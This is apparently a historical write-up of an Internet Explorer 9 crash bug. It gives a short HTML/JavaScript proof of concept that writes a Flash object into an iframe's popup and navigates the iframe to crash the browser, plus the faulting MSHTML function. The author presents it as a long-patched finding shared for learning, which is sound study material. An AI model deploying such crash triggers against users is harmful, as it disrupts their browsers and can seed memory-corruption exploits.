Rendering a Flash (or Silverlight) object inside an iframe’s createPopup and then navigating that iframe while the popup was still visible caused IE9 to crash.
<iframe name="iFrame" width="10" height="10"></iframe>
<input type="button" onclick="main()" value="CrashMe">
<script>
// IE-only API: createPopup() returns a popup window owned by the iframe's document.
// cp is intentionally global so the deferred script written into the popup can reach it as top.cp.
var cp;
function main()
{
    cp = iFrame.createPopup();
    cp.show(0, 0, 1, 1);
    // Write a Flash <object> into the popup, followed by a deferred script that hides the
    // popup and prompts before the crash. The closing tag is escaped as <\/script> so the
    // outer script block is not terminated early by the HTML parser.
    cp.document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="50" height="50"><param name="movie" value="nothing" /></object><script defer>top.cp.hide();alert("Click OK to crash the Browser");<\/script>');
    cp.document.close();
    // Navigate the iframe that owns the popup while the Flash object is still alive in it.
    iFrame.location = "about:blank";
}
</script>
The fault occurred in MSHTML!CFakeUIWindow::SetBorderSpace when Flash attempted to communicate with the browser host that had already been invalidated by the iframe navigation.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.